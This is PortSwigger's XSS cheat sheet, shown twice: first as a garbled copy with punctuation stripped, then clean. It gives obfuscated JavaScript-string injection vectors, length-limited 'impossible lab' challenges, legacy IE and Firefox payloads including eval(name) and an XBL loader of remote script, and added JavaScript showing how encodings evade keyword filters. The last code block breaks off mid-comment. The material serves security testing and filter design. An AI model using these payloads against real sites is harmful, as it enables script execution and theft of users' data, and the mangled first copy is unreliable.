This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to: James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape (window)
window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (self)
self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (this)
this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (top)
top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (parent)
parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (frames)
frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (globalThis)
globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property (window)
window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (self)
self[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (this)
this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (top)
top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (parent)
parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (frames)
frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (globalThis)
globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (window)
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (self)
self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (this)
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (top)
top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (parent)
parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (frames)
frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis)
globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
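The octal, unicode, RegExp source and JSFuck vectors above all reach the same global property through a computed key, which is why a WAF rule that looks for the word "alert" (or "eval", "fetch", ...) inside a JavaScript string context never fires. The following JavaScript is an added example, not code from the cheat sheet: it evaluates each key expression in isolation (they reference no globals, so `Function` is safe here for offline analysis, never for untrusted input in production), checks whether a naive blocklist would have matched the raw text, and includes the escape decoder a filter would need before it could match string literals at all. The key expressions are copied from the vectors; the blocklist regex and decoder are my own.

```javascript
// Added example (not from the cheat sheet): show that every obfuscated key in
// the "XSS into a JavaScript string" vectors resolves to the same property
// name, so matching the raw payload against a keyword list cannot see the call.

// Key expressions taken from the vectors; each is a JavaScript expression
// whose value is a string.
const OBFUSCATED_KEYS = {
  octal:   "'\\141\\154\\145\\162\\164'",
  unicode: "'\\u0061\\u006c\\u0065\\u0072\\u0074'",
  regexp:  "/al/.source+/ert/.source",
  jsfuck:  "(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]",
};

// Evaluate a key expression on its own. Sloppy mode is required: octal escapes
// such as \141 are a SyntaxError under "use strict". Only use this on
// expressions you control; it is an analysis aid, not an input filter.
function resolveKey(expr) {
  return Function("return (" + expr + ");")();
}

// The kind of check a naive WAF rule applies to the raw payload text.
function naiveBlocklist(payload) {
  return /\balert\b/i.test(payload);
}

// Static decoder for the string-literal escapes a filter must understand before
// it can match: octal (\141), hex (\x61), \u0061 and \u{61}. Handles only the
// escape forms; it is not a full JavaScript string parser.
function decodeStringEscapes(literal) {
  return literal.replace(
    /\\(?:u\{([0-9a-fA-F]+)\}|u([0-9a-fA-F]{4})|x([0-9a-fA-F]{2})|([0-7]{1,3}))/g,
    (match, brace, u4, x2, oct) => {
      if (brace !== undefined) return String.fromCodePoint(parseInt(brace, 16));
      if (u4 !== undefined) return String.fromCharCode(parseInt(u4, 16));
      if (x2 !== undefined) return String.fromCharCode(parseInt(x2, 16));
      return String.fromCharCode(parseInt(oct, 8));
    }
  );
}

// For each variant: what the bracket lookup really reaches, and whether the
// naive rule would have caught it.
function analyse() {
  const out = {};
  for (const [name, expr] of Object.entries(OBFUSCATED_KEYS)) {
    out[name] = { resolved: resolveKey(expr), blocked: naiveBlocklist(expr) };
  }
  return out;
}

// Stand-alone run: prints one line per variant.
for (const [name, r] of Object.entries(analyse())) {
  console.log(`${name.padEnd(8)} -> "${r.resolved}"  naive blocklist hit: ${r.blocked}`);
}
```

The practical conclusion is the one the cheat sheet is built around: once an attacker controls a JavaScript string that is later used as a property key, the only robust defence is to keep untrusted data out of script context entirely (JSON-encode it into a data attribute or a `<script type="application/json">` block and read it from there), not to pattern-match on identifiers.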
Classic vectors (XSS crypt)
Image src with JavaScript protocol
<img src="javascript:alert(1)">
Body background with JavaScript protocol
<body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers give them a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
Impossible labs
Title | Description | Length limit | Closest vector
Basic context, WAF blocks <[a-zA-Z]
This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A. Closest vector: N/A.
Script based injection, but quotes, forward slash and backslash are escaped
We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block.
The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.
Length limit: N/A. Closest vector: N/A.
innerHTML context, but no equals allowed
You have a site that processes the query string and URL decodes the parameters, but splits on the equals, then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.
Length limit: N/A. Closest vector: N/A.
Basic context, length limit
This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q oncut=alert``, but can you beat it?
Length limit: 15. Closest vector: <q oncut=alert``
Attribute context, length limit
The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14. Closest vector: oncut=alert`` (with trailing space)
Basic context, length limit, arbitrary code
It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19. Closest vector: <q oncut=eval(name)
Attribute context, length limit, arbitrary code
Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.
Length limit: 17. Closest vector: see link
Injection occurs inside a frameset but before the body
We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A. Closest vector: N/A.
Injection occurs inside single quoted string, only characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A. Closest vector: N/A.
Classic vectors (continued)
VBScript protocol used to work in IE
<a href="vbscript:MsgBox+1">XSS</a>
<a href="#" onclick="vbs:Msgbox+1">XSS</a>
<a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="#" language="vbs" onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE
<a href="#" onclick="jscript.compact:alert(1);">test</a>
<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScriptEncode allows encoded JavaScript
<a href="#" language="JScriptEncode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href="#" onclick="JScriptEncode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScriptEncode allows encoded VBScript
<iframe onload="VBScriptEncode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
<iframe language="VBScriptEncode" onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator
<a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator
<link href="xss.js" rel="stylesheet" type="text/javascript">
Button used to consume markup
<form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL (Firefox only, <= 2)
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="\-\mo\z-binding:\url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
XBL also worked in FF3.5 using data URLs
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />
CSS expressions (<= IE7)
<div style="xss:expression(alert(1))">
<div style="xss:expression(1)-alert(1)">
<div style="xss:expressio\6e(alert(1))">
<div style="xss:expressio\006e(alert(1))">
<div style="xss:expressio\00006e(alert(1))">
<div style="xss:expressio&#x5c;6e(alert(1))">
In quirks mode IE allowed you to use = instead of :
<div style="xss=expression(alert(1))">
<div style="color&#x3d;red">test</div>
Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions
<script>function window.onload(){alert(1)}</script>
<script>function window::onload(){alert(1)}</script>
<script>function window.location(){}</script>
<body><script>function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}</script></body>
<body><script>function document.body.innerHTML(){x="<img src=1 onerror=alert(1)>"}</script></body>
GreyMagic HTML+time exploit (no longer works, even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"></BODY></HTML>
Firefox allows NULLs after & (the NUL byte between & and # is not printable here)
<a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities (the NUL byte inside &colon; is not printable here)
<a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments (the NUL byte inside the <!-- > prefix is not printable here)
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
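The two href vectors above work because Firefox discarded the NUL byte and then decoded the character reference before looking at the URL scheme, so a filter that inspects the raw attribute value sees `javascript&col...on;` and never a `javascript:` prefix. The JavaScript below is an added example, not code from the cheat sheet: it models that tolerant decoding step and compares a naive raw-text scheme check against one run on the normalised value. The NUL positions in the sample inputs are an assumption (the cheat sheet cannot display the byte), and the named-reference table is a deliberately small stand-in for the full HTML entity list.

```javascript
// Added example (not from the cheat sheet): normalise an attribute value the
// way the Firefox NUL/entity vectors rely on, then test the URL scheme.

// Minimal named-reference table for the demo; a real decoder needs the full
// HTML named character reference list (over 2000 entries).
const NAMED_REFS = {
  colon: ":", lpar: "(", rpar: ")", amp: "&", lt: "<", gt: ">",
  quot: '"', apos: "'", Tab: "\t", NewLine: "\n",
};

// Drop NUL bytes, then decode numeric (&#x6a; / &#106;) and named (&colon;)
// character references. The trailing semicolon is optional, as in browsers.
function decodeAttributeValue(raw) {
  const noNul = raw.replace(/\u0000/g, "");
  return noNul.replace(
    /&(?:#[xX]([0-9a-fA-F]+)|#([0-9]+)|([A-Za-z]+));?/g,
    (match, hex, dec, name) => {
      if (hex !== undefined || dec !== undefined) {
        const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
        return cp > 0x10ffff ? match : String.fromCodePoint(cp);
      }
      return Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : match;
    }
  );
}

// Scheme test on the decoded value: browsers ignore leading C0 controls and
// whitespace and strip tab/newline from URLs, so do the same before matching.
function isJavascriptUrl(decoded) {
  const stripped = decoded.replace(/^[\u0000-\u0020]+/, "").replace(/[\t\n\r]/g, "");
  return /^javascript:/i.test(stripped);
}

// The check a naive filter performs on the raw, undecoded attribute value.
function naiveJavascriptCheck(raw) {
  return /^javascript:/i.test(raw);
}

// Compare the two views of one href value.
function classify(raw) {
  const decoded = decodeAttributeValue(raw);
  return {
    decoded,
    naive: naiveJavascriptCheck(raw),
    normalised: isJavascriptUrl(decoded),
  };
}

// Constructed inputs modelled on the vectors above. Where the NUL byte sits is
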